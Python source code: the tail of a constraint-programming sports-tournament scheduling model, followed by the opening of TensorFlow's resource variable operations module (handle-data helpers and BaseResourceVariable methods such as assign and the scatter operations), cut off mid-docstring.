# the first week is set : 0 vs 1, 2 vs 3, 4 vs 5, etc.
[m[0][p] == match_number(2 * p, 2 * p + 1) for p in range(nPeriods)]
]
)
if variant("dummy"):
# hd[p] is the home team for the dummy match of period p tag(dummy-week)
hd = VarArray(size=nPeriods, dom=range(nTeams))
# ad[p] is the away team for the dummy match of period p tag(dummy-week)
ad = VarArray(size=nPeriods, dom=range(nTeams))
satisfy(
# handling dummy week (variables and constraints) tag(dummy-week)
[
# all teams are different in the dummy week
AllDifferent(hd + ad),
# each team plays two times in each period
[Cardinality(h[:, p] + a[:, p] + [hd[p], ad[p]], occurrences={t: 2 for t in range(nTeams)}) for p in range(nPeriods)],
# tag(symmetry-breaking)
[hd[p] < ad[p] for p in range(nPeriods)]
]
)
|
the-stack_0_26014
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops to use variables as resources."""
# pylint: disable=g-bad-name
import contextlib
import functools
import weakref
import numpy as np
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.framework import variable_pb2
from tensorflow.python.client import pywrap_tf_session
from tensorflow.python.compat import compat as forward_compat
from tensorflow.python.eager import context
from tensorflow.python.eager import tape
from tensorflow.python.framework import auto_control_deps_utils as acd
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import cpp_shape_inference_pb2
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import indexed_slices
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_spec
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import gen_state_ops
from tensorflow.python.ops import handle_data_util
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.ops.gen_resource_variable_ops import *
# pylint: enable=wildcard-import
from tensorflow.python.training.tracking import base as trackable
from tensorflow.python.types import core
from tensorflow.python.util import _pywrap_utils
from tensorflow.python.util import compat
from tensorflow.python.util.deprecation import deprecated
from tensorflow.python.util.tf_export import tf_export
acd.register_read_only_resource_op("ReadVariableOp")
acd.register_read_only_resource_op("VariableShape")
acd.register_read_only_resource_op("ResourceGather")
acd.register_read_only_resource_op("ResourceGatherNd")
acd.register_read_only_resource_op("_ReadVariablesOp")
# TODO(allenl): Remove this alias and migrate callers.
get_resource_handle_data = handle_data_util.get_resource_handle_data
def get_eager_safe_handle_data(handle):
"""Get the data handle from the Tensor `handle`."""
assert isinstance(handle, ops.Tensor)
if isinstance(handle, ops.EagerTensor):
return handle._handle_data # pylint: disable=protected-access
else:
return get_resource_handle_data(handle)
def _set_handle_shapes_and_types(tensor, handle_data, graph_mode):
"""Sets the shape inference result HandleData on tensor.
Args:
tensor: A `Tensor` or `EagerTensor`.
handle_data: A `CppShapeInferenceResult.HandleData`.
graph_mode: A python bool.
"""
tensor._handle_data = handle_data # pylint: disable=protected-access
if not graph_mode:
return
# Not an EagerTensor, so a graph tensor.
shapes, types = zip(*[(pair.shape, pair.dtype)
for pair in handle_data.shape_and_type])
ranks = [len(s.dim) if not s.unknown_rank else -1 for s in shapes]
shapes = [
[d.size for d in s.dim] # pylint: disable=g-complex-comprehension
if not s.unknown_rank else None for s in shapes
]
pywrap_tf_session.TF_GraphSetOutputHandleShapesAndTypes_wrapper(
tensor._op._graph._c_graph, # pylint: disable=protected-access
tensor._as_tf_output(), # pylint: disable=protected-access
shapes,
ranks,
types)
def _combine_handle_data(handle, initial_value):
"""Concats HandleData from tensors `handle` and `initial_value`.
Args:
handle: A `Tensor` of dtype `resource`.
initial_value: A `Tensor`.
Returns:
A `CppShapeInferenceResult.HandleData`. If `initial_value` has dtype
`variant`, the `HandleData` contains the concatenation of the shape_and_type
from both `handle` and `initial_value`.
Raises:
RuntimeError: If handle, which was returned by VarHandleOp, either has
no handle data, or its len(handle_data.shape_and_type) != 1.
"""
assert handle.dtype == dtypes.resource
variable_handle_data = get_eager_safe_handle_data(handle)
if initial_value.dtype != dtypes.variant:
return variable_handle_data
extra_handle_data = get_eager_safe_handle_data(initial_value)
if extra_handle_data is not None and extra_handle_data.is_set:
if (variable_handle_data is None or not variable_handle_data.is_set or
len(variable_handle_data.shape_and_type) != 1):
raise RuntimeError(
"Expected VarHandleOp to return a length==1 shape_and_type, "
f"but saw: '{variable_handle_data}'")
variable_handle_data.shape_and_type.extend(extra_handle_data.shape_and_type)
return variable_handle_data
def _variable_handle_from_shape_and_dtype(shape,
dtype,
shared_name,
name,
graph_mode,
initial_value=None):
"""Create a variable handle, copying in handle data from `initial_value`."""
container = ops.get_default_graph()._container # pylint: disable=protected-access
if container is None:
container = ""
shape = tensor_shape.as_shape(shape)
dtype = dtypes.as_dtype(dtype)
if not graph_mode:
if shared_name is not None:
raise errors.InternalError( # pylint: disable=no-value-for-parameter
"Using an explicit shared_name is not allowed when executing eagerly."
)
shared_name = context.anonymous_name()
handle = gen_resource_variable_ops.var_handle_op(
shape=shape,
dtype=dtype,
shared_name=shared_name,
name=name,
container=container)
if initial_value is None:
initial_value = handle
if graph_mode:
full_handle_data = _combine_handle_data(handle, initial_value)
_set_handle_shapes_and_types(handle, full_handle_data, graph_mode)
return handle
else:
handle_data = cpp_shape_inference_pb2.CppShapeInferenceResult.HandleData()
handle_data.is_set = True
handle_data.shape_and_type.append(
cpp_shape_inference_pb2.CppShapeInferenceResult.HandleShapeAndType(
shape=shape.as_proto(), dtype=dtype.as_datatype_enum))
if initial_value is not None and initial_value.dtype == dtypes.variant:
extra_handle_data = get_eager_safe_handle_data(initial_value)
if extra_handle_data is not None and extra_handle_data.is_set:
if (not handle_data.is_set or len(handle_data.shape_and_type) != 1):
raise RuntimeError(
"Expected VarHandleOp to return a length==1 shape_and_type, "
f"but saw: '{handle_data}'")
handle_data.shape_and_type.extend(extra_handle_data.shape_and_type)
_set_handle_shapes_and_types(handle, handle_data, graph_mode)
return handle
def eager_safe_variable_handle(initial_value, shape, shared_name, name,
graph_mode):
"""Creates a variable handle with information to do shape inference.
The dtype is read from `initial_value` and stored in the returned
resource tensor's handle data.
If `initial_value.dtype == tf.variant`, we additionally extract the handle
data (if any) from `initial_value` and append it to the `handle_data`.
In this case, the returned tensor's handle data is in the form
```
is_set: true
shape_and_type {
shape {
// initial_value.shape
}
dtype: DT_VARIANT
}
shape_and_type {
// handle_data(initial_value).shape_and_type[0]
}
shape_and_type {
// handle_data(initial_value).shape_and_type[1]
}
...
```
Ops that read from this tensor, such as `ReadVariableOp` and
`AssignVariableOp`, know that `handle_data(handle).shape_and_type[1:]`
correspond to the handle data of the variant(s) stored in the Variable.
Args:
initial_value: A `Tensor`.
shape: The shape of the handle data. Can be `TensorShape(None)` (i.e.
unknown shape).
shared_name: A string.
name: A string.
graph_mode: A python bool.
Returns:
The handle, a `Tensor` of type `resource`.
"""
dtype = initial_value.dtype.base_dtype
return _variable_handle_from_shape_and_dtype(shape, dtype, shared_name, name,
graph_mode, initial_value)
@contextlib.contextmanager
def _handle_graph(handle):
# Note: might have an eager tensor but not be executing eagerly when building
# functions.
if (context.executing_eagerly() or isinstance(handle, ops.EagerTensor) or
ops.has_default_graph()):
yield
else:
with handle.graph.as_default():
yield
class EagerResourceDeleter:
"""An object which cleans up a resource handle.
An alternative to defining a __del__ method on an object. The intended use is
that ResourceVariables or other objects with resource handles will maintain a
single reference to this object. When the parent object is collected, this
object will be too. Even if the parent object is part of a reference cycle,
the cycle will be collectable.
"""
__slots__ = ["_handle", "_handle_device", "_context"]
def __init__(self, handle, handle_device):
if not isinstance(handle, ops.Tensor):
raise ValueError(
(f"Passed handle={handle} to EagerResourceDeleter. Was expecting "
f"the handle to be a `tf.Tensor`."))
self._handle = handle
self._handle_device = handle_device
# This is held since the __del__ function runs an op, and if the context()
# is collected before this object, there will be a segfault when running the
# op.
self._context = context.context()
def __del__(self):
# Resources follow object-identity when executing eagerly, so it is safe to
# delete the resource we have a handle to.
try:
# A packed EagerTensor doesn't own any resource.
if isinstance(self._handle, ops.EagerTensor) and self._handle.is_packed:
return
# This resource was created in eager mode. However, this destructor may be
# running in graph mode (especially during unit tests). To clean up
# successfully, we switch back into eager mode temporarily.
with context.eager_mode():
with ops.device(self._handle_device):
gen_resource_variable_ops.destroy_resource_op(
self._handle, ignore_lookup_error=True)
except TypeError:
# Suppress some exceptions, mainly for the case when we're running on
# module deletion. Things that can go wrong include the context module
# already being unloaded, self._handle._handle_data no longer being
# valid, and so on. Printing warnings in these cases is silly
# (exceptions raised from __del__ are printed as warnings to stderr).
pass # 'NoneType' object is not callable when the handle has been
# partially unloaded.
except AttributeError:
pass # 'NoneType' object has no attribute 'eager_mode' when context has
# been unloaded. Will catch other module unloads as well.
def shape_safe_assign_variable_handle(handle, shape, value, name=None):
"""Helper that checks shape compatibility and assigns variable."""
with _handle_graph(handle):
value_tensor = ops.convert_to_tensor(value)
shape.assert_is_compatible_with(value_tensor.shape)
return gen_resource_variable_ops.assign_variable_op(
handle, value_tensor, name=name)
def _maybe_set_handle_data(dtype, handle, tensor):
if dtype == dtypes.variant:
# For DT_VARIANT types, the handle's shape_and_type[1:] stores the
# variant's handle data. Extract it.
handle_data = get_eager_safe_handle_data(handle)
if handle_data.is_set and len(handle_data.shape_and_type) > 1:
tensor._handle_data = ( # pylint: disable=protected-access
cpp_shape_inference_pb2.CppShapeInferenceResult.HandleData(
is_set=True, shape_and_type=handle_data.shape_and_type[1:]))
def variable_accessed(variable):
"""Records that `variable` was accessed for the tape and FuncGraph."""
if hasattr(ops.get_default_graph(), "watch_variable"):
ops.get_default_graph().watch_variable(variable)
if variable.trainable:
tape.variable_accessed(variable)
class BaseResourceVariable(variables.VariableV1, core.Tensor):
"""A python variable from an existing handle."""
# TODO(wangpeng): Deprecate `constraint` when callers no long pass it in.
def __init__( # pylint: disable=super-init-not-called
self,
trainable=None,
shape=None,
dtype=None,
handle=None,
constraint=None,
synchronization=None,
aggregation=None,
distribute_strategy=None,
name=None,
unique_id=None,
handle_name=None,
graph_element=None,
initial_value=None,
initializer_op=None,
is_initialized_op=None,
cached_value=None,
save_slice_info=None,
caching_device=None,
in_graph_mode=None,
**unused_kwargs):
"""Creates a variable from a handle.
Args:
trainable: If `True`, GradientTapes automatically watch uses of this
Variable.
shape: The variable's shape. This shape can be set to tf.TensorShape(None)
in order to assign values of different shapes to this variable.
Otherwise (i.e. if the shape is fully determined), it will trigger run
time checks to ensure that each assignment is of the same shape.
dtype: The variable's dtype.
handle: The variable's handle
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
distribute_strategy: The distribution strategy this variable was created
under.
name: The name for this variable.
unique_id: Internal. Unique ID for this variable's handle.
handle_name: The name for the variable's handle.
graph_element: Optional, required only in session.run-mode. Pre-created
tensor which reads this variable's value.
initial_value: Optional. Variable's initial value.
initializer_op: Operation which assigns the variable's initial value.
is_initialized_op: Pre-created operation to check whether this variable is
initialized.
cached_value: Pre-created operation to read this variable in a specific
device.
save_slice_info: Metadata for variable partitioning.
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
in_graph_mode: whether we are executing in TF1 graph mode. If None, will
detect within the function. This is to avoid repeated init_scope()
conetxt entrances which can add up.
"""
if in_graph_mode is None:
with ops.init_scope():
self._in_graph_mode = not context.executing_eagerly()
else:
self._in_graph_mode = in_graph_mode
synchronization, aggregation, trainable = (
variables.validate_synchronization_aggregation_trainable(
synchronization, aggregation, trainable, name))
self._trainable = trainable
self._synchronization = synchronization
self._aggregation = aggregation
self._save_slice_info = save_slice_info
self._initial_value = initial_value
self._initializer_op = initializer_op
self._is_initialized_op = is_initialized_op
self._graph_element = graph_element
self._caching_device = caching_device
self._cached_value = cached_value
self._distribute_strategy = distribute_strategy
# Store the graph key so optimizers know how to only retrieve variables from
# this graph. Guaranteed to be the same as the eager graph_key.
self._graph_key = ops.get_default_graph()._graph_key # pylint: disable=protected-access
self._shape = tensor_shape.as_shape(shape)
self._dtype = dtypes.as_dtype(dtype)
self._handle = handle
self._unique_id = unique_id
self._handle_name = handle_name + ":0"
self._constraint = constraint
self._cached_shape_as_list = None
def __repr__(self):
if context.executing_eagerly() and not self._in_graph_mode:
# If we cannot read the value for any reason (e.g. variable uninitialized
# during tf.function tracing), still produce a __repr__. Note that for
# async eager, errors due to uninitialized variables will raise in
# ops.value_text when the handle is resolved, so we need to keep that
# under the try...except if we want to suppress them.
try:
with ops.device(self.device):
value_text = ops.value_text(self.read_value(), is_repr=True)
except: # pylint: disable=bare-except
value_text = "numpy=<unavailable>"
return "<tf.Variable '%s' shape=%s dtype=%s, %s>" % (
self.name, self.get_shape(), self.dtype.name, value_text)
else:
return "<tf.Variable '%s' shape=%s dtype=%s>" % (
self.name, self.get_shape(), self.dtype.name)
def __tf_tracing_type__(self, signature_context):
return signature_context.make_reference_type(
VariableSpec(self.shape, self.dtype), self._handle._id) # pylint:disable=protected-access
@contextlib.contextmanager
def _assign_dependencies(self):
"""Makes assignments depend on the cached value, if any.
This prevents undefined behavior with reads not ordered wrt writes.
Yields:
None.
"""
if self._cached_value is not None:
with ops.control_dependencies([self._cached_value]):
yield
else:
yield
def __array__(self, dtype=None):
"""Allows direct conversion to a numpy array.
>>> np.array(tf.Variable([1.0]))
array([1.], dtype=float32)
Returns:
The variable value as a numpy array.
"""
# You can't return `self.numpy()` here because for scalars
# that raises:
# ValueError: object __array__ method not producing an array
# Even `self.read_value().__array__()` and `self.read_value()._numpy()` give
# the same error. The `EagerTensor` class must be doing something behind the
# scenes to make `np.array(tf.constant(1))` work.
return np.asarray(self.numpy(), dtype=dtype)
def __nonzero__(self):
return self.__bool__()
def __bool__(self):
return bool(self.read_value())
def __copy__(self):
return self
def __deepcopy__(self, memo):
if not context.executing_eagerly():
raise NotImplementedError(
"__deepcopy__() is only available when eager execution is enabled.")
copied_variable = ResourceVariable(
initial_value=self.read_value(),
trainable=self._trainable,
constraint=self._constraint,
dtype=self._dtype,
name=self._shared_name,
distribute_strategy=self._distribute_strategy,
synchronization=self.synchronization,
aggregation=self.aggregation)
memo[self._unique_id] = copied_variable
return copied_variable
@property
def dtype(self):
"""The dtype of this variable."""
return self._dtype
@property
def device(self):
"""The device this variable is on."""
return self.handle.device
@property
def graph(self):
"""The `Graph` of this variable."""
return self.handle.graph
@property
def name(self):
"""The name of the handle for this variable."""
return self._handle_name
@property
def shape(self):
"""The shape of this variable."""
return self._shape
def set_shape(self, shape):
self._shape = self._shape.merge_with(shape)
def _shape_as_list(self):
if self.shape.ndims is None:
return None
return [dim.value for dim in self.shape.dims]
def _shape_tuple(self):
shape = self._shape_as_list()
if shape is None:
return None
return tuple(shape)
@property
def create(self):
"""The op responsible for initializing this variable."""
if not self._in_graph_mode:
raise RuntimeError("This operation is not supported "
"when eager execution is enabled.")
return self._initializer_op
@property
def handle(self):
"""The handle by which this variable can be accessed."""
return self._handle
def value(self):
"""A cached operation which reads the value of this variable."""
if self._cached_value is not None:
return self._cached_value
with ops.colocate_with(None, ignore_existing=True):
return self._read_variable_op()
def _as_graph_element(self):
"""Conversion function for Graph.as_graph_element()."""
return self._graph_element
@property
def initializer(self):
"""The op responsible for initializing this variable."""
return self._initializer_op
@property
def initial_value(self):
"""Returns the Tensor used as the initial value for the variable."""
if context.executing_eagerly():
raise RuntimeError("This property is not supported "
"when eager execution is enabled.")
return self._initial_value
@property
def constraint(self):
"""Returns the constraint function associated with this variable.
Returns:
The constraint function that was passed to the variable constructor.
Can be `None` if no constraint was passed.
"""
return self._constraint
@property
def op(self):
"""The op for this variable."""
return self.handle.op
@property
def trainable(self):
return self._trainable
@property
def synchronization(self):
return self._synchronization
@property
def aggregation(self):
return self._aggregation
def eval(self, session=None):
"""Evaluates and returns the value of this variable."""
if context.executing_eagerly():
raise RuntimeError("This operation is not supported "
"when eager execution is enabled.")
return self._graph_element.eval(session=session)
def numpy(self):
if context.executing_eagerly():
return self.read_value().numpy()
raise NotImplementedError(
"numpy() is only available when eager execution is enabled.")
@deprecated(None, "Prefer Dataset.range instead.")
def count_up_to(self, limit):
"""Increments this variable until it reaches `limit`.
When that Op is run it tries to increment the variable by `1`. If
incrementing the variable would bring it above `limit` then the Op raises
the exception `OutOfRangeError`.
If no error is raised, the Op outputs the value of the variable before
the increment.
This is essentially a shortcut for `count_up_to(self, limit)`.
Args:
limit: value at which incrementing the variable raises an error.
Returns:
A `Tensor` that will hold the variable value before the increment. If no
other Op modifies this variable, the values produced will all be
distinct.
"""
return gen_state_ops.resource_count_up_to(
self.handle, limit=limit, T=self.dtype)
def _map_resources(self, save_options):
"""For implementing `Trackable`."""
new_variable = None
if save_options.experimental_variable_policy._save_variable_devices(): # pylint:disable=protected-access
with ops.device(self.device):
new_variable = copy_to_graph_uninitialized(self)
else:
new_variable = copy_to_graph_uninitialized(self)
obj_map = {self: new_variable}
resource_map = {self.handle: new_variable.handle}
return obj_map, resource_map
def _read_variable_op(self):
variable_accessed(self)
def read_and_set_handle():
result = gen_resource_variable_ops.read_variable_op(
self.handle, self._dtype)
_maybe_set_handle_data(self._dtype, self.handle, result)
return result
if getattr(self, "_caching_device", None) is not None:
with ops.colocate_with(None, ignore_existing=True):
with ops.device(self._caching_device):
result = read_and_set_handle()
else:
result = read_and_set_handle()
if not context.executing_eagerly():
# Note that if a control flow context is active the input of the read op
# might not actually be the handle. This line bypasses it.
tape.record_operation(
"ReadVariableOp", [result], [self.handle],
backward_function=lambda x: [x],
forward_function=lambda x: [x])
return result
def read_value(self):
"""Constructs an op which reads the value of this variable.
Should be used when there are multiple reads, or when it is desirable to
read the value only after some condition is true.
Returns:
the read operation.
"""
with ops.name_scope("Read"):
value = self._read_variable_op()
# Return an identity so it can get placed on whatever device the context
# specifies instead of the device where the variable is.
return array_ops.identity(value)
def sparse_read(self, indices, name=None):
"""Reads the value of this variable sparsely, using `gather`."""
with ops.name_scope("Gather" if name is None else name) as name:
variable_accessed(self)
value = gen_resource_variable_ops.resource_gather(
self.handle, indices, dtype=self._dtype, name=name)
if self._dtype == dtypes.variant:
# For DT_VARIANT types, the handle's shape_and_type[1:] stores the
# variant's handle data. Extract it.
handle_data = get_eager_safe_handle_data(self.handle)
if handle_data.is_set and len(handle_data.shape_and_type) > 1:
value._handle_data = ( # pylint: disable=protected-access
cpp_shape_inference_pb2.CppShapeInferenceResult.HandleData(
is_set=True, shape_and_type=handle_data.shape_and_type[1:]))
return array_ops.identity(value)
def gather_nd(self, indices, name=None):
"""Reads the value of this variable sparsely, using `gather_nd`."""
with ops.name_scope("GatherNd" if name is None else name) as name:
if self.trainable:
variable_accessed(self)
value = gen_resource_variable_ops.resource_gather_nd(
self.handle, indices, dtype=self._dtype, name=name)
return array_ops.identity(value)
def to_proto(self, export_scope=None):
"""Converts a `ResourceVariable` to a `VariableDef` protocol buffer.
Args:
export_scope: Optional `string`. Name scope to remove.
Raises:
RuntimeError: If run in EAGER mode.
Returns:
A `VariableDef` protocol buffer, or `None` if the `Variable` is not
in the specified name scope.
"""
if context.executing_eagerly():
raise RuntimeError("This operation is not supported "
"when eager execution is enabled.")
if export_scope is None or self.handle.name.startswith(export_scope):
var_def = variable_pb2.VariableDef()
var_def.variable_name = ops.strip_name_scope(self.handle.name,
export_scope)
if self._initial_value is not None:
# This is inside an if-statement for backwards compatibility, since
# self._initial_value might be None for variables constructed from old
# protos.
var_def.initial_value_name = ops.strip_name_scope(
self._initial_value.name, export_scope)
var_def.initializer_name = ops.strip_name_scope(self.initializer.name,
export_scope)
if self._cached_value is not None:
var_def.snapshot_name = ops.strip_name_scope(self._cached_value.name,
export_scope)
else:
# Store the graph_element here
var_def.snapshot_name = ops.strip_name_scope(self._graph_element.name,
export_scope)
var_def.is_resource = True
var_def.trainable = self.trainable
var_def.synchronization = self.synchronization.value
var_def.aggregation = self.aggregation.value
if self._save_slice_info:
var_def.save_slice_info_def.MergeFrom(
self._save_slice_info.to_proto(export_scope=export_scope))
return var_def
else:
return None
@staticmethod
def from_proto(variable_def, import_scope=None):
if context.executing_eagerly():
raise RuntimeError("This operation is not supported "
"when eager execution is enabled.")
return ResourceVariable(
variable_def=variable_def, import_scope=import_scope)
__array_priority__ = 100
def is_initialized(self, name=None):
"""Checks whether a resource variable has been initialized.
Outputs boolean scalar indicating whether the tensor has been initialized.
Args:
name: A name for the operation (optional).
Returns:
A `Tensor` of type `bool`.
"""
return gen_resource_variable_ops.var_is_initialized_op(self.handle, name)
def assign_sub(self, delta, use_locking=None, name=None, read_value=True):
"""Subtracts a value from this variable.
Args:
delta: A `Tensor`. The value to subtract from this variable.
use_locking: If `True`, use locking during the operation.
name: The name to use for the operation.
read_value: A `bool`. Whether to read and return the new value of the
variable or not.
Returns:
If `read_value` is `True`, this method will return the new value of the
variable after the assignment has completed. Otherwise, when in graph mode
it will return the `Operation` that does the assignment, and when in eager
mode it will return `None`.
"""
# TODO(apassos): this here and below is not atomic. Consider making it
# atomic if there's a way to do so without a performance cost for those who
# don't need it.
with _handle_graph(self.handle), self._assign_dependencies():
assign_sub_op = gen_resource_variable_ops.assign_sub_variable_op(
self.handle,
ops.convert_to_tensor(delta, dtype=self.dtype),
name=name)
if read_value:
return self._lazy_read(assign_sub_op)
return assign_sub_op
def assign_add(self, delta, use_locking=None, name=None, read_value=True):
"""Adds a value to this variable.
Args:
delta: A `Tensor`. The value to add to this variable.
use_locking: If `True`, use locking during the operation.
name: The name to use for the operation.
read_value: A `bool`. Whether to read and return the new value of the
variable or not.
Returns:
If `read_value` is `True`, this method will return the new value of the
variable after the assignment has completed. Otherwise, when in graph mode
it will return the `Operation` that does the assignment, and when in eager
mode it will return `None`.
"""
with _handle_graph(self.handle), self._assign_dependencies():
assign_add_op = gen_resource_variable_ops.assign_add_variable_op(
self.handle,
ops.convert_to_tensor(delta, dtype=self.dtype),
name=name)
if read_value:
return self._lazy_read(assign_add_op)
return assign_add_op
def _lazy_read(self, op):
variable_accessed(self)
return _UnreadVariable(
handle=self.handle,
dtype=self.dtype,
shape=self._shape,
in_graph_mode=self._in_graph_mode,
parent_op=op,
unique_id=self._unique_id)
def assign(self, value, use_locking=None, name=None, read_value=True):
"""Assigns a new value to this variable.
Args:
value: A `Tensor`. The new value for this variable.
use_locking: If `True`, use locking during the assignment.
name: The name to use for the assignment.
read_value: A `bool`. Whether to read and return the new value of the
variable or not.
Returns:
If `read_value` is `True`, this method will return the new value of the
variable after the assignment has completed. Otherwise, when in graph mode
it will return the `Operation` that does the assignment, and when in eager
mode it will return `None`.
"""
# Note: not depending on the cached value here since this can be used to
# initialize the variable.
with _handle_graph(self.handle):
value_tensor = ops.convert_to_tensor(value, dtype=self.dtype)
if not self._shape.is_compatible_with(value_tensor.shape):
if self.name is None:
tensor_name = ""
else:
tensor_name = " " + str(self.name)
raise ValueError(
(f"Cannot assign value to variable '{tensor_name}': Shape mismatch."
f"The variable shape {self._shape}, and the "
f"assigned value shape {value_tensor.shape} are incompatible."))
kwargs = {}
if forward_compat.forward_compatible(2022, 3, 23):
# If the shape is fully defined, we do a runtime check with the shape of
# value.
validate_shape = self._shape.is_fully_defined()
kwargs["validate_shape"] = validate_shape
assign_op = gen_resource_variable_ops.assign_variable_op(
self.handle, value_tensor, name=name, **kwargs)
if read_value:
return self._lazy_read(assign_op)
return assign_op
def __reduce__(self):
# The implementation mirrors that of __deepcopy__.
return functools.partial(
ResourceVariable,
initial_value=self.numpy(),
trainable=self.trainable,
name=self._shared_name,
dtype=self.dtype,
constraint=self.constraint,
distribute_strategy=self._distribute_strategy), ()
def scatter_sub(self, sparse_delta, use_locking=False, name=None):
"""Subtracts `tf.IndexedSlices` from this variable.
Args:
sparse_delta: `tf.IndexedSlices` to be subtracted from this variable.
use_locking: If `True`, use locking during the operation.
name: the name of the operation.
Returns:
The updated variable.
Raises:
TypeError: if `sparse_delta` is not an `IndexedSlices`.
"""
if not isinstance(sparse_delta, indexed_slices.IndexedSlices):
raise TypeError(f"Argument `sparse_delta` must be a "
f"`tf.IndexedSlices`. Received arg: {sparse_delta}")
return self._lazy_read(
gen_resource_variable_ops.resource_scatter_sub(
self.handle,
sparse_delta.indices,
ops.convert_to_tensor(sparse_delta.values, self.dtype),
name=name))
def scatter_add(self, sparse_delta, use_locking=False, name=None):
"""Adds `tf.IndexedSlices` to this variable.
Args:
sparse_delta: `tf.IndexedSlices` to be added to this variable.
use_locking: If `True`, use locking during the operation.
name: the name of the operation.
Returns:
The updated variable.
Raises:
TypeError: if `sparse_delta` is not an `IndexedSlices`.
"""
if not isinstance(sparse_delta, indexed_slices.IndexedSlices):
raise TypeError(f"Argument `sparse_delta` must be a "
f"`tf.IndexedSlices`. Received arg: {sparse_delta}")
return self._lazy_read(
gen_resource_variable_ops.resource_scatter_add(
self.handle,
sparse_delta.indices,
ops.convert_to_tensor(sparse_delta.values, self.dtype),
name=name))
def scatter_max(self, sparse_delta, use_locking=False, name=None):
"""Updates this variable with the max of `tf.IndexedSlices` and itself.
Args:
sparse_delta: `tf.IndexedSlices` to use as an argument of max with this
variable.
use_locking: If `True`, use locking during the operation.
name: the name of the operation.
Returns:
The updated variable.
Raises:
TypeError: if `sparse_delta` is not an `IndexedSlices`.
"""
if not isinstance(sparse_delta, indexed_slices.IndexedSlices):
raise TypeError(f"Argument `sparse_delta` must be a "
f"`tf.IndexedSlices`. Received arg: {sparse_delta}")
return self._lazy_read(
gen_resource_variable_ops.resource_scatter_max(
self.handle,
sparse_delta.indices,
ops.convert_to_tensor(sparse_delta.values, self.dtype),
name=name))
def scatter_min(self, sparse_delta, use_locking=False, name=None):
"""Updates this variable with the min of `tf.IndexedSlices` and itself.
Args:
sparse_delta: `tf.IndexedSlices` to use as an argument of min with this
variable.
use_locking: If `True`, use locking during the operation.
name: the name of the operation.
Returns:
The updated variable.
Raises:
TypeError: if `sparse_delta` is not an `IndexedSlices`.
"""
if not isinstance(sparse_delta, indexed_slices.IndexedSlices):
raise TypeError(f"Argument `sparse_delta` must be a "
f"`tf.IndexedSlices`. Received arg: {sparse_delta}")
return self._lazy_read(
gen_resource_variable_ops.resource_scatter_min(
self.handle,
sparse_delta.indices,
ops.convert_to_tensor(sparse_delta.values, self.dtype),
name=name))
def scatter_mul(self, sparse_delta, use_locking=False, name=None):
"""Multiply this variable by `tf.IndexedSlices`.
Args:
sparse_delta: `tf.IndexedSlices` to multiply this variable by.
use_locking: If `True`, use locking during the operation.
name: the name of the operation.
Returns:
The updated variable.
Raises:
TypeError: if `sparse_delta` is not an `IndexedSlices`.
"""
if not isinstance(sparse_delta, indexed_slices.IndexedSlices):
raise TypeError(f"Argument `sparse_delta` must be a "
f"`tf.IndexedSlices`. Received arg: {sparse_delta}")
return self._lazy_read(
gen_resource_variable_ops.resource_scatter_mul(
self.handle,
sparse_delta.indices,
ops.convert_to_tensor(sparse_delta.values, self.dtype),
name=name))
def scatter_div(self, sparse_delta, use_locking=False, name=None):
"""Divide this variable by `tf.IndexedSlices`.
Args:
sparse_delta: `tf.IndexedSlices` to divide this variable by.
use_locking: If `True`, use locking during the operation.
name: the name of the operation.
Returns:
The updated variable.
Raises:
TypeError: if `sparse_delta` is not an `IndexedSlices`.
"""
if not isinstance(sparse_delta, indexed_slices.IndexedSlices):
raise TypeError(f"Argument `sparse_delta` must be a "
f"`tf.IndexedSlices`. Received arg: {sparse_delta}")
return self._lazy_read(
gen_resource_variable_ops.resource_scatter_div(
self.handle,
sparse_delta.indices,
ops.convert_to_tensor(sparse_delta.values, self.dtype),
name=name))
def scatter_update(self, sparse_delta, use_locking=False, name=None):
"""Assigns `tf.IndexedSlices` to this variable.
Args:
sparse_delta: `tf.IndexedSlices` to be assigned to this variable.
use_locking: If `True`, use locking during the operation.
name: the name of the operation.
Returns:
The updated variable.
Raises:
TypeError: if `sparse_delta` is not an `IndexedSlices`.
"""
if not isinstance(sparse_delta, indexed_slices.IndexedSlices):
raise TypeError(f"Argument `sparse_delta` must be a "
f"`tf.IndexedSlices`. Received arg: {sparse_delta}")
return self._lazy_read(
gen_resource_variable_ops.resource_scatter_update(
self.handle,
sparse_delta.indices,
ops.convert_to_tensor(sparse_delta.values, self.dtype),
name=name))
def batch_scatter_update(self, sparse_delta, use_locking=False, name=None):
"""Assigns `tf.IndexedSlices` to this variable batch-wise.
Analogous to `batch_gather`. This assumes that this variable and the
sparse_delta IndexedSlices have a series of leading dimensions that are the
same for all of them, and the updates are performed on the last dimension of
indices. In other words, the dimensions should be the following:
`num_prefix_dims = sparse_delta.indices.ndims - 1`
`batch_dim = num_prefix_dims + 1`
`sparse_delta.updates.shape = sparse_delta.indices.shape + var.shape[
